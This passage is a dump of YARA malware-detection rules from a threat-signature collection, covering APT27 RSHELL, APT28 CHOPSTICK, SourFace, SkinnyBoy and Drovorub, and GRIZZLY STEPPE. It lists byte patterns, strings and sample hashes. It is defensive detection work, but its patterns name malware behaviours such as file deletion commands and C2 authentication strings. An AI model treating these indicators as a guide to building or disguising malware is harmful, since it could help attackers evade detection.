$encrypted_pe_header_shift_149 = { 91 4e 95 e2 ef 25 95 98 95 95 95 17 99 95 c5 94 94 95 }
$encrypted_pe_header_shift_150 = { 92 4f 96 e3 f0 26 96 99 96 96 96 18 9a 96 c6 95 95 96 }
$encrypted_pe_header_shift_151 = { 93 50 97 e4 f1 27 97 9a 97 97 97 19 9b 97 c7 96 96 97 }
$encrypted_pe_header_shift_152 = { 94 51 98 e5 f2 28 98 9b 98 98 98 1a 9c 98 c8 97 97 98 }
$encrypted_pe_header_shift_153 = { 95 52 99 e6 f3 29 99 9c 99 99 99 1b 9d 99 c9 98 98 99 }
$encrypted_pe_header_shift_154 = { 96 53 9a e7 f4 2a 9a 9d 9a 9a 9a 1c 9e 9a ca 99 99 9a }
$encrypted_pe_header_shift_155 = { 97 54 9b e8 f5 2b 9b 9e 9b 9b 9b 1d 9f 9b cb 9a 9a 9b }
$encrypted_pe_header_shift_156 = { 98 55 9c e9 f6 2c 9c 9f 9c 9c 9c 1e a0 9c cc 9b 9b 9c }
$encrypted_pe_header_shift_157 = { 99 56 9d ea f7 2d 9d a0 9d 9d 9d 1f a1 9d cd 9c 9c 9d }
$encrypted_pe_header_shift_158 = { 9a 57 9e eb f8 2e 9e a1 9e 9e 9e 20 a2 9e ce 9d 9d 9e }
$encrypted_pe_header_shift_159 = { 9b 58 9f ec f9 2f 9f a2 9f 9f 9f 21 a3 9f cf 9e 9e 9f }
$encrypted_pe_header_shift_160 = { 9c 59 a0 ed fa 30 a0 a3 a0 a0 a0 22 a4 a0 d0 9f 9f a0 }
$encrypted_pe_header_shift_161 = { 9d 5a a1 ee fb 31 a1 a4 a1 a1 a1 23 a5 a1 d1 a0 a0 a1 }
$encrypted_pe_header_shift_162 = { 9e 5b a2 ef fc 32 a2 a5 a2 a2 a2 24 a6 a2 d2 a1 a1 a2 }
$encrypted_pe_header_shift_163 = { 9f 5c a3 f0 fd 33 a3 a6 a3 a3 a3 25 a7 a3 d3 a2 a2 a3 }
$encrypted_pe_header_shift_164 = { a0 5d a4 f1 fe 34 a4 a7 a4 a4 a4 26 a8 a4 d4 a3 a3 a4 }
$encrypted_pe_header_shift_165 = { a1 5e a5 f2 ff 35 a5 a8 a5 a5 a5 27 a9 a5 d5 a4 a4 a5 }
$encrypted_pe_header_shift_166 = { a2 5f a6 f3 00 36 a6 a9 a6 a6 a6 28 aa a6 d6 a5 a5 a6 }
$encrypted_pe_header_shift_167 = { a3 60 a7 f4 01 37 a7 aa a7 a7 a7 29 ab a7 d7 a6 a6 a7 }
$encrypted_pe_header_shift_168 = { a4 61 a8 f5 02 38 a8 ab a8 a8 a8 2a ac a8 d8 a7 a7 a8 }
$encrypted_pe_header_shift_169 = { a5 62 a9 f6 03 39 a9 ac a9 a9 a9 2b ad a9 d9 a8 a8 a9 }
$encrypted_pe_header_shift_170 = { a6 63 aa f7 04 3a aa ad aa aa aa 2c ae aa da a9 a9 aa }
$encrypted_pe_header_shift_171 = { a7 64 ab f8 05 3b ab ae ab ab ab 2d af ab db aa aa ab }
$encrypted_pe_header_shift_172 = { a8 65 ac f9 06 3c ac af ac ac ac 2e b0 ac dc ab ab ac }
$encrypted_pe_header_shift_173 = { a9 66 ad fa 07 3d ad b0 ad ad ad 2f b1 ad dd ac ac ad }
$encrypted_pe_header_shift_174 = { aa 67 ae fb 08 3e ae b1 ae ae ae 30 b2 ae de ad ad ae }
$encrypted_pe_header_shift_175 = { ab 68 af fc 09 3f af b2 af af af 31 b3 af df ae ae af }
$encrypted_pe_header_shift_176 = { ac 69 b0 fd 0a 40 b0 b3 b0 b0 b0 32 b4 b0 e0 af af b0 }
$encrypted_pe_header_shift_177 = { ad 6a b1 fe 0b 41 b1 b4 b1 b1 b1 33 b5 b1 e1 b0 b0 b1 }
$encrypted_pe_header_shift_178 = { ae 6b b2 ff 0c 42 b2 b5 b2 b2 b2 34 b6 b2 e2 b1 b1 b2 }
$encrypted_pe_header_shift_179 = { af 6c b3 00 0d 43 b3 b6 b3 b3 b3 35 b7 b3 e3 b2 b2 b3 }
$encrypted_pe_header_shift_180 = { b0 6d b4 01 0e 44 b4 b7 b4 b4 b4 36 b8 b4 e4 b3 b3 b4 }
$encrypted_pe_header_shift_181 = { b1 6e b5 02 0f 45 b5 b8 b5 b5 b5 37 b9 b5 e5 b4 b4 b5 }
$encrypted_pe_header_shift_182 = { b2 6f b6 03 10 46 b6 b9 b6 b6 b6 38 ba b6 e6 b5 b5 b6 }
$encrypted_pe_header_shift_183 = { b3 70 b7 04 11 47 b7 ba b7 b7 b7 39 bb b7 e7 b6 b6 b7 }
$encrypted_pe_header_shift_184 = { b4 71 b8 05 12 48 b8 bb b8 b8 b8 3a bc b8 e8 b7 b7 b8 }
$encrypted_pe_header_shift_185 = { b5 72 b9 06 13 49 b9 bc b9 b9 b9 3b bd b9 e9 b8 b8 b9 }
$encrypted_pe_header_shift_186 = { b6 73 ba 07 14 4a ba bd ba ba ba 3c be ba ea b9 b9 ba }
$encrypted_pe_header_shift_187 = { b7 74 bb 08 15 4b bb be bb bb bb 3d bf bb eb ba ba bb }
$encrypted_pe_header_shift_188 = { b8 75 bc 09 16 4c bc bf bc bc bc 3e c0 bc ec bb bb bc }
$encrypted_pe_header_shift_189 = { b9 76 bd 0a 17 4d bd c0 bd bd bd 3f c1 bd ed bc bc bd }
$encrypted_pe_header_shift_190 = { ba 77 be 0b 18 4e be c1 be be be 40 c2 be ee bd bd be }
$encrypted_pe_header_shift_191 = { bb 78 bf 0c 19 4f bf c2 bf bf bf 41 c3 bf ef be be bf }
$encrypted_pe_header_shift_192 = { bc 79 c0 0d 1a 50 c0 c3 c0 c0 c0 42 c4 c0 f0 bf bf c0 }
$encrypted_pe_header_shift_193 = { bd 7a c1 0e 1b 51 c1 c4 c1 c1 c1 43 c5 c1 f1 c0 c0 c1 }
$encrypted_pe_header_shift_194 = { be 7b c2 0f 1c 52 c2 c5 c2 c2 c2 44 c6 c2 f2 c1 c1 c2 }
$encrypted_pe_header_shift_195 = { bf 7c c3 10 1d 53 c3 c6 c3 c3 c3 45 c7 c3 f3 c2 c2 c3 }
$encrypted_pe_header_shift_196 = { c0 7d c4 11 1e 54 c4 c7 c4 c4 c4 46 c8 c4 f4 c3 c3 c4 }
$encrypted_pe_header_shift_197 = { c1 7e c5 12 1f 55 c5 c8 c5 c5 c5 47 c9 c5 f5 c4 c4 c5 }
$encrypted_pe_header_shift_198 = { c2 7f c6 13 20 56 c6 c9 c6 c6 c6 48 ca c6 f6 c5 c5 c6 }
$encrypted_pe_header_shift_199 = { c3 80 c7 14 21 57 c7 ca c7 c7 c7 49 cb c7 f7 c6 c6 c7 }
$encrypted_pe_header_shift_200 = { c4 81 c8 15 22 58 c8 cb c8 c8 c8 4a cc c8 f8 c7 c7 c8 }
$encrypted_pe_header_shift_201 = { c5 82 c9 16 23 59 c9 cc c9 c9 c9 4b cd c9 f9 c8 c8 c9 }
$encrypted_pe_header_shift_202 = { c6 83 ca 17 24 5a ca cd ca ca ca 4c ce ca fa c9 c9 ca }
$encrypted_pe_header_shift_203 = { c7 84 cb 18 25 5b cb ce cb cb cb 4d cf cb fb ca ca cb }
$encrypted_pe_header_shift_204 = { c8 85 cc 19 26 5c cc cf cc cc cc 4e d0 cc fc cb cb cc }
$encrypted_pe_header_shift_205 = { c9 86 cd 1a 27 5d cd d0 cd cd cd 4f d1 cd fd cc cc cd }
$encrypted_pe_header_shift_206 = { ca 87 ce 1b 28 5e ce d1 ce ce ce 50 d2 ce fe cd cd ce }
$encrypted_pe_header_shift_207 = { cb 88 cf 1c 29 5f cf d2 cf cf cf 51 d3 cf ff ce ce cf }
$encrypted_pe_header_shift_208 = { cc 89 d0 1d 2a 60 d0 d3 d0 d0 d0 52 d4 d0 00 cf cf d0 }
$encrypted_pe_header_shift_209 = { cd 8a d1 1e 2b 61 d1 d4 d1 d1 d1 53 d5 d1 01 d0 d0 d1 }
$encrypted_pe_header_shift_210 = { ce 8b d2 1f 2c 62 d2 d5 d2 d2 d2 54 d6 d2 02 d1 d1 d2 }
$encrypted_pe_header_shift_211 = { cf 8c d3 20 2d 63 d3 d6 d3 d3 d3 55 d7 d3 03 d2 d2 d3 }
$encrypted_pe_header_shift_212 = { d0 8d d4 21 2e 64 d4 d7 d4 d4 d4 56 d8 d4 04 d3 d3 d4 }
$encrypted_pe_header_shift_213 = { d1 8e d5 22 2f 65 d5 d8 d5 d5 d5 57 d9 d5 05 d4 d4 d5 }
$encrypted_pe_header_shift_214 = { d2 8f d6 23 30 66 d6 d9 d6 d6 d6 58 da d6 06 d5 d5 d6 }
$encrypted_pe_header_shift_215 = { d3 90 d7 24 31 67 d7 da d7 d7 d7 59 db d7 07 d6 d6 d7 }
$encrypted_pe_header_shift_216 = { d4 91 d8 25 32 68 d8 db d8 d8 d8 5a dc d8 08 d7 d7 d8 }
$encrypted_pe_header_shift_217 = { d5 92 d9 26 33 69 d9 dc d9 d9 d9 5b dd d9 09 d8 d8 d9 }
$encrypted_pe_header_shift_218 = { d6 93 da 27 34 6a da dd da da da 5c de da 0a d9 d9 da }
$encrypted_pe_header_shift_219 = { d7 94 db 28 35 6b db de db db db 5d df db 0b da da db }
$encrypted_pe_header_shift_220 = { d8 95 dc 29 36 6c dc df dc dc dc 5e e0 dc 0c db db dc }
$encrypted_pe_header_shift_221 = { d9 96 dd 2a 37 6d dd e0 dd dd dd 5f e1 dd 0d dc dc dd }
$encrypted_pe_header_shift_222 = { da 97 de 2b 38 6e de e1 de de de 60 e2 de 0e dd dd de }
$encrypted_pe_header_shift_223 = { db 98 df 2c 39 6f df e2 df df df 61 e3 df 0f de de df }
$encrypted_pe_header_shift_224 = { dc 99 e0 2d 3a 70 e0 e3 e0 e0 e0 62 e4 e0 10 df df e0 }
$encrypted_pe_header_shift_225 = { dd 9a e1 2e 3b 71 e1 e4 e1 e1 e1 63 e5 e1 11 e0 e0 e1 }
$encrypted_pe_header_shift_226 = { de 9b e2 2f 3c 72 e2 e5 e2 e2 e2 64 e6 e2 12 e1 e1 e2 }
$encrypted_pe_header_shift_227 = { df 9c e3 30 3d 73 e3 e6 e3 e3 e3 65 e7 e3 13 e2 e2 e3 }
$encrypted_pe_header_shift_228 = { e0 9d e4 31 3e 74 e4 e7 e4 e4 e4 66 e8 e4 14 e3 e3 e4 }
$encrypted_pe_header_shift_229 = { e1 9e e5 32 3f 75 e5 e8 e5 e5 e5 67 e9 e5 15 e4 e4 e5 }
$encrypted_pe_header_shift_230 = { e2 9f e6 33 40 76 e6 e9 e6 e6 e6 68 ea e6 16 e5 e5 e6 }
$encrypted_pe_header_shift_231 = { e3 a0 e7 34 41 77 e7 ea e7 e7 e7 69 eb e7 17 e6 e6 e7 }
$encrypted_pe_header_shift_232 = { e4 a1 e8 35 42 78 e8 eb e8 e8 e8 6a ec e8 18 e7 e7 e8 }
$encrypted_pe_header_shift_233 = { e5 a2 e9 36 43 79 e9 ec e9 e9 e9 6b ed e9 19 e8 e8 e9 }
$encrypted_pe_header_shift_234 = { e6 a3 ea 37 44 7a ea ed ea ea ea 6c ee ea 1a e9 e9 ea }
$encrypted_pe_header_shift_235 = { e7 a4 eb 38 45 7b eb ee eb eb eb 6d ef eb 1b ea ea eb }
$encrypted_pe_header_shift_236 = { e8 a5 ec 39 46 7c ec ef ec ec ec 6e f0 ec 1c eb eb ec }
$encrypted_pe_header_shift_237 = { e9 a6 ed 3a 47 7d ed f0 ed ed ed 6f f1 ed 1d ec ec ed }
$encrypted_pe_header_shift_238 = { ea a7 ee 3b 48 7e ee f1 ee ee ee 70 f2 ee 1e ed ed ee }
$encrypted_pe_header_shift_239 = { eb a8 ef 3c 49 7f ef f2 ef ef ef 71 f3 ef 1f ee ee ef }
$encrypted_pe_header_shift_240 = { ec a9 f0 3d 4a 80 f0 f3 f0 f0 f0 72 f4 f0 20 ef ef f0 }
$encrypted_pe_header_shift_241 = { ed aa f1 3e 4b 81 f1 f4 f1 f1 f1 73 f5 f1 21 f0 f0 f1 }
$encrypted_pe_header_shift_242 = { ee ab f2 3f 4c 82 f2 f5 f2 f2 f2 74 f6 f2 22 f1 f1 f2 }
$encrypted_pe_header_shift_243 = { ef ac f3 40 4d 83 f3 f6 f3 f3 f3 75 f7 f3 23 f2 f2 f3 }
$encrypted_pe_header_shift_244 = { f0 ad f4 41 4e 84 f4 f7 f4 f4 f4 76 f8 f4 24 f3 f3 f4 }
$encrypted_pe_header_shift_245 = { f1 ae f5 42 4f 85 f5 f8 f5 f5 f5 77 f9 f5 25 f4 f4 f5 }
$encrypted_pe_header_shift_246 = { f2 af f6 43 50 86 f6 f9 f6 f6 f6 78 fa f6 26 f5 f5 f6 }
$encrypted_pe_header_shift_247 = { f3 b0 f7 44 51 87 f7 fa f7 f7 f7 79 fb f7 27 f6 f6 f7 }
$encrypted_pe_header_shift_248 = { f4 b1 f8 45 52 88 f8 fb f8 f8 f8 7a fc f8 28 f7 f7 f8 }
$encrypted_pe_header_shift_249 = { f5 b2 f9 46 53 89 f9 fc f9 f9 f9 7b fd f9 29 f8 f8 f9 }
$encrypted_pe_header_shift_250 = { f6 b3 fa 47 54 8a fa fd fa fa fa 7c fe fa 2a f9 f9 fa }
$encrypted_pe_header_shift_251 = { f7 b4 fb 48 55 8b fb fe fb fb fb 7d ff fb 2b fa fa fb }
$encrypted_pe_header_shift_252 = { f8 b5 fc 49 56 8c fc ff fc fc fc 7e 00 fc 2c fb fb fc }
$encrypted_pe_header_shift_253 = { f9 b6 fd 4a 57 8d fd 00 fd fd fd 7f 01 fd 2d fc fc fd }
$encrypted_pe_header_shift_254 = { fa b7 fe 4b 58 8e fe 01 fe fe fe 80 02 fe 2e fd fd fe }
$encrypted_pe_header_shift_255 = { fb b8 ff 4c 59 8f ff 02 ff ff ff 81 03 ff 2f fe fe ff }
condition:
filesize < 200KB and (1 of ($encrypted_pe_header_shift_*))
}

View file

@ -0,0 +1,40 @@
rule APT_MAL_APT27_Rshell_Jul24 {
meta:
sharing = "TLP:WHITE"
source = "BUNDESAMT FUER VERFASSUNGSSCHUTZ"
author = "Bundesamt fuer Verfassungsschutz, modified by Florian Roth"
description = "YARA rule to detect RSHELL of APT27"
category = "MALWARE"
malware = "RSHELL / SYSUPDATE"
reference = "https://x.com/bfv_bund/status/1811364839656185985?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
date = "2024-07-11"
hash1 = "0433edfad648e1e29be54101abaded690302dc7e49ad916cfbbddf99b3ade12c"
hash2 = "10bb89fdf25c88d3c5623e8d68573124c9a42549750014e3675e2ca342aeba4a"
hash3 = "2603e1f61363451891c97b0c4ce8acfbfb680d3df4282f9d151ecce3a5679616"
hash4 = "70dac42491f8f19568a5d7b1d10b29f732a88d75e7f2bfa07b23202bacadf56f"
hash5 = "b988a6583ce40f07e5fc8e890ae2b1c84a93db8a2e3ca8769241b94bea332a7a"
hash6 = "c4fe1e56f601d411e2385352606524fb8bbf773bc2ba14889a8de605c2d14da0"
hash7 = "c787144d285fcca8a542f7a5525a37bcd089b39068b9a4db7fe3554ee6c08301"
hash8 = "ddaa4d23e4651a517fffbd29f0924607ba6b6253171144da5e49237afe91666b"
strings:
$a1 = "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%" ascii
$a2 = "/proc/self/exe" ascii
$s1 = "HISTFILE" ascii fullword
$s2 = "/tmp/guid" ascii fullword
$sop1 = { e8 ?? ?? ?? ?? c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? }
$sop2 = { c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? f7 d8 }
condition:
(
uint32be(0) == 0x7f454c46 // Linux
or ( uint32be(0) == 0xcafebabe and uint32be(4) < 0x20 ) // Universal mach-O App with dont-match-java-class-file hack
or uint32(0) == 0xfeedface // 32-bit mach-O
or uint32(0) == 0xfeedfacf // 64-bit mach-O
)
and filesize < 2MB
and all of ($a*)
and 2 of ($s*)
or 3 of ($s*)
}

159
yara-Neo23x0/apt_apt28.yar Normal file
View file

@ -0,0 +1,159 @@
/*
Yara Rule Set
Author: YarGen Rule Generator
Date: 2015-06-02
Identifier: APT28
*/
/* Rule Set ----------------------------------------------------------------- */
rule APT28_CHOPSTICK {
meta:
description = "Detects a malware that behaves like CHOPSTICK mentioned in APT28 report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/v3ebal"
date = "2015-06-02"
hash = "f4db2e0881f83f6a2387ecf446fcb4a4c9f99808"
score = 60
id = "08bc4cc2-1844-5218-bb89-20a3ac70a951"
strings:
$s0 = "jhuhugit.tmp" fullword ascii /* score: '14.005' */
$s8 = "KERNEL32.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 14405 times */
$s9 = "IsDebuggerPresent" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 3518 times */
$s10 = "IsProcessorFeaturePresent" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 1383 times */
$s11 = "TerminateProcess" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 13081 times */
$s13 = "DeleteFileA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 1384 times */
$s15 = "GetProcessHeap" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 5875 times */
$s16 = "!This program cannot be run in DOS mode." fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 20908 times */
$s17 = "LoadLibraryA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 5461 times */
condition:
uint16(0) == 0x5a4d and filesize < 722KB and all of them
}
rule APT28_SourFace_Malware1 {
meta:
description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
date = "2015-06-01"
hash1 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
hash2 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
score = 60
id = "d4275b8d-384f-58b7-bac5-05fb7db659e2"
strings:
$s0 = "coreshell.dll" fullword wide /* PEStudio Blacklist: strings */
$s1 = "Core Shell Runtime Service" fullword wide /* PEStudio Blacklist: strings */
$s2 = "\\chkdbg.log" wide
condition:
uint16(0) == 0x5a4d and filesize < 62KB and all of them
}
rule APT28_SourFace_Malware2 {
meta:
description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
date = "2015-06-01"
super_rule = 1
hash0 = "367d40465fd1633c435b966fa9b289188aa444bc"
hash1 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
hash2 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
hash3 = "682e49efa6d2549147a21993d64291bfa40d815a"
hash4 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
hash5 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
score = 60
id = "8a9df742-82c1-56bb-ab70-6384403f70b5"
strings:
$s0 = "coreshell.dll" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "Applicate" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
rule APT28_SourFace_Malware3 {
meta:
description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
date = "2015-06-01"
super_rule = 1
hash0 = "85522190958c82589fa290c0835805f3d9a2f8d6"
hash1 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
hash2 = "367d40465fd1633c435b966fa9b289188aa444bc"
hash3 = "d87b310aa81ae6254fff27b7d57f76035f544073"
hash4 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
hash5 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
hash6 = "682e49efa6d2549147a21993d64291bfa40d815a"
hash7 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
hash8 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
hash9 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
score = 60
id = "b49843b9-3a54-5525-958e-ac545cc00bde"
strings:
$s0 = "coreshell.dll" fullword wide /* PEStudio Blacklist: strings */
$s1 = "Core Shell Runtime Service" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
import "pe"
rule APT28_SkinnyBoy_Dropper: RUSSIA {
meta:
description = "Detects APT28 SkinnyBoy droppers"
author = "Cluster25"
date = "2021-05-24"
reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
id = "ed0b2d2b-f820-57b5-9654-c24734d81996"
strings:
$ = "cmd /c DEL " ascii
/* $ = " \"" ascii */ /* slowing down scanning */
$ = {8a 08 40 84 c9 75 f9}
$ = {0f b7 84 0d fc fe ff ff 66 31 84 0d fc fd ff ff}
condition:
(uint16(0) == 0x5A4D and all of them)
}
rule APT28_SkinnyBoy_Launcher: RUSSIA {
meta:
description = "Detects APT28 SkinnyBoy launchers"
author = "Cluster25"
date = "2021-05-24"
reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
hash1 ="2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
id = "eaf4e8e5-cbec-5000-a2ff-31d1dac4c30f"
strings:
$sha = {F4 EB 56 52 AF 4B 48 EE 08 FF 9D 44 89 4B D5 66 24 61 2A 15 1D 58 14 F9 6D 97
13 2C 6D 07 6F 86}
$l1 = "CryptGetHashParam" ascii
$l2 = "CryptCreateHash" ascii
$l3 = "FindNextFile" ascii
$l4 = "PathAddBackslashW" ascii
$l5 = "PathRemoveFileSpecW" ascii
$h1 = {50 6A 00 6A 00 68 0C 80 00 00 FF ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A 00
56 ?? ?? ?? ?? 50 FF ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ??}
$h2 = {8B 01 3B 02 75 10 83 C1 04 83 C2 04 83 EE 04 73 EF}
condition:
uint16(0) == 0x5a4d and filesize < 100KB and ($sha or (all of ($l*) and all of ($h*)))
}
rule APT28_SkinnyBoy_Implanter: RUSSIA {
meta:
description = "Detects APT28 SkinnyBoy implanter"
author = "Cluster25"
date = "2021-05-24"
reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
id = "c44faf95-a64c-58f4-97d4-2fe17aefc813"
strings:
$enc_string = {F3 0F 7E 05 ?? ?? ?? ?? 6? [5] 6A ?? 66 [6] 66 [7] F3 0F 7E 05 ?? ?? ?? ?? 8D
85 [4] 6A ?? 50 66 [7] E8}
$heap_ops = {8B [1-5] 03 ?? 5? 5? 6A 08 FF [1-6] FF ?? ?? ?? ?? ?? [0-6] 8B ?? [0-6] 8?}
$xor_cycle = { 8A 8C ?? ?? ?? ?? ?? 30 8C ?? ?? ?? ?? ?? 42 3B D0 72 }
condition:
uint16(0) == 0x5a4d and pe.is_dll() and filesize < 100KB and $xor_cycle and $heap_ops and
$enc_string
}

View file

@ -0,0 +1,115 @@
rule APT_APT28_generic_poco_openssl {
meta:
description = "Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)"
author = "NSA / FBI"
reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
date = "2020-08-13"
score = 50
strings:
$mw1 = { 89 F1 48 89 FE 48 89 D7 48 F7 C6 FF FF FF FF 0F 84 6B 02 00 00 48 F7 C7
FF FF FF FF 0F 84 5E 02 00 00 48 8D 2D }
$mw2 = { 41 54 49 89 D4 55 53 F6 47 19 04 48 8B 2E 75 08 31 DB F6 45 00 03 75 }
$mw3 = { 85C0BA15000000750989D05BC30F1F44 0000BE }
$mw4 = { 53 8A 47 08 3C 06 74 21 84 C0 74 1D 3C 07 74 20 B9 ?? ?? ?? ?? BA FD 03
00 00 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E8 06 3C 01 77 2B 48 8B 1F 48 8B 73
10 48 89 DF E8 ?? ?? ?? ?? 48 8D 43 08 48 C7 43 10 00 00 00 00 48 C7 43 28 00 00 00 00 48
89 43 18 48 89 43 20 5B C3 }
condition:
all of them
}
rule APT_APT28_drovorub_library_and_unique_strings {
meta:
description = "Rule to detect Drovorub-server, Drovorub-agent, and Drovorub-client"
author = "NSA / FBI"
reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
date = "2020-08-13"
score = 75
id = "8e010356-09c7-5897-9cbe-051cd0800502"
strings:
$s1 = "Poco" ascii wide
$s2 = "Json" ascii wide
$s3 = "OpenSSL" ascii wide
$a1 = "clientid" ascii wide
$a2 = "-----BEGIN" ascii wide
$a3 = "-----END" ascii wide
$a4 = "tunnel" ascii wide
condition:
(filesize > 1MB and filesize < 10MB and (uint32(0) == 0x464c457f)) and (#s1 > 20 and #s2 > 15 and #s3 > 15 and all of ($a*))
}
rule APT_APT28_drovorub_unique_network_comms_strings {
meta:
description = "Rule to detect Drovorub-server, Drovorub-agent, or Drovorub-client based"
author = "NSA / FBI"
reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
date = "2020-08-13"
score = 75
id = "c6a930e8-c1c0-5d96-9051-7516df848b45"
strings:
$s_01 = "action" wide ascii
$s_02 = "auth.commit" wide ascii
$s_03 = "auth.hello" wide ascii
$s_04 = "auth.login" wide ascii
$s_05 = "auth.pending" wide ascii
$s_06 = "client_id" wide ascii
$s_07 = "client_login" wide ascii
$s_08 = "client_pass" wide ascii
$s_09 = "clientid" wide ascii
$s_10 = "clientkey_base64" wide ascii
$s_11 = "file_list_request" wide ascii
$s_12 = "module_list_request" wide ascii
$s_13 = "monitor" wide ascii
$s_14 = "net_list_request" wide ascii
$s_15 = "server finished" wide ascii
$s_16 = "serverid" wide ascii
$s_17 = "tunnel" wide ascii
condition:
all of them
}
/* FPs
48505c956c005576b1292495102a5a4d37a830dc936ce85204d2783e13082c1f
rule APT_APT28_drovorub_kernel_module_unique_strings {
meta:
description = "Rule detects the Drovorub-kernel module based on unique strings"
author = "NSA / FBI"
reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
date = "2020-08-13"
score = 75
strings:
$s_01 = "/proc" wide ascii
$s_02 = "/proc/net/packet" wide ascii
$s_03 = "/proc/net/raw" wide ascii
$s_04 = "/proc/net/tcp" wide ascii
$s_05 = "/proc/net/tcp6" wide ascii
$s_06 = "/proc/net/udp" wide ascii
$s_07 = "/proc/net/udp6" wide ascii
$s_08 = "cs02" wide ascii
$s_09 = "do_fork" wide ascii
$s_10 = "es01" wide ascii
$s_11 = "g001" wide ascii
$s_12 = "g002" wide ascii
$s_13 = "i001" wide ascii
$s_14 = "i002" wide ascii
$s_15 = "i003" wide ascii
$s_16 = "i004" wide ascii
$s_17 = "module" wide ascii
$s_18 = "sc!^2a" wide ascii
$s_19 = "sysfs" wide ascii
$s_20 = "tr01" wide ascii
$s_21 = "tr02" wide ascii
$s_22 = "tr03" wide ascii
$s_23 = "tr04" wide ascii
$s_24 = "tr05" wide ascii
$s_25 = "tr06" wide ascii
$s_26 = "tr07" wide ascii
$s_27 = "tr08" wide ascii
$s_28 = "tr09" wide ascii
condition:
all of them
}
*/

View file

@ -0,0 +1,311 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-12-29
Identifier: GRIZZLY STEPPE
*/
/* Rule Set ----------------------------------------------------------------- */
rule GRIZZLY_STEPPE_Malware_1 {
meta:
description = "Auto-generated rule - file HRDG022184_certclint.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/WVflzO"
date = "2016-12-29"
hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
id = "7239a5f3-9c29-57d7-be95-946d14039353"
strings:
$s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
$s2 = "Repeat last find command)Replace specific text with different text" fullword wide
$s3 = "l\\Processor(0)\\% Processor Time" fullword wide
$s6 = "Self Process" fullword wide
$s7 = "Default Process" fullword wide
$s8 = "Star Polk.exe" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 300KB and 4 of them )
}
rule GRIZZLY_STEPPE_Malware_2 {
meta:
description = "Auto-generated rule"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/WVflzO"
date = "2016-12-29"
